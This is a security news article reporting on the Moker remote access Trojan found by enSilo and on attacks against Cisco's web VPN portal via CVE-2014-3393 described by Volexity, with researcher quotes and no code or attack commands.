Virtual private network (VPN) connections can provide a false sense of security, and two separate and newly discovered attack campaigns exploiting the much-vaunted corporate channel serve as a wakeup call for how attackers can abuse and use VPNs.
Meanwhile, enSilo researchers spotted a cyber espionage attack using a remote access Trojan (RAT) that among other things allows an attacker to log into a machine it infects using the user's legitimate credentials. The so-called Moker RAT disables and sneaks past antivirus, sandboxes, and virtual machine-based tools, as well as Microsoft Windows' User Access Control (UAC) feature.
Moker, which attaches itself to the Windows operating system and poses as a legitimate OS process, can be used by the attacker to operate "locally," according to enSilo. "Consider a scenario where the attacker logs on to the infected machine using the VPN credentials of a legitimate user. In that case, the attacker connects to the machine from remote – but locally controls Moker," says Yotam Gottesman, a senior security researcher at enSilo. "The attacker can then perform all the cyber espionage activities one imagines a RAT doing such keylogging, taking screenshots, monitoring Web traffic – and even altering it."
In the Cisco VPN attacks detailed by Volexity, one method exploits a known and patched authentication-check vulnerability in the Cisco Clientless SSL VPN portal, CVE-2014-3393. In February, Cisco issued a notice warning of public exploits for the flaw. There's also Metasploit module available for the attack. "While Cisco provided updated software to address the vulnerability, attackers were already off to the races. Vulnerable organizations that were slow to update may have received an unwelcome addition to the source of their logon.html file," Volexity researchers wrote in a blog post today.
The weakness in Cisco's Web-based VPN isn't unique to Cisco, however, according to Volexity. "Attackers are continuing to find new ways to use and abuse systems for long term persistent access to networks and systems of interest. This problem is not remotely unique to Cisco Web VPNs. Any other VPN, web server, or appliance that an attacker can gain administrative access to or otherwise customize/modify will potentially present similar risks," Volexity says.
enSilo first found Moker on a customer's machine in a "sensitive" network environment. Gottesman says his team thus far isn't sure of who's behind the attacks or their geographic location, but it's likely an attacker with advanced skill and resources. Among its capabilities is creating a new user account and opening a Remote Desktop Protocol channel for remote control of the endpoint; taking screenshots, monitoring keystrokes, stealing files; and replacing legitimate code with malware in the system processes.
"What made this an interesting APT is that it gave us a deep look into the malware: from the ways it defeats security measures, such as using 2-step installation and exploiting various Windows vulnerabilities, to trying and deceive security researchers once detected," Gottesman says. "It’s obvious that the malware’s authors invested heavily in this malware."
When Moker creates a new user with the stolen admin privileges, the victim has no idea because the attacker has cheated UAC. The attacker then further covers his tracks: "The new administrator user never visually appears on the on the login screen. During cleanup, this user is also deleted from the system," he says. "Apart from trying to remain stealthy, it looks like the threat actors were also looking at extending the malware’s longevity by placing many anti-research capabilities."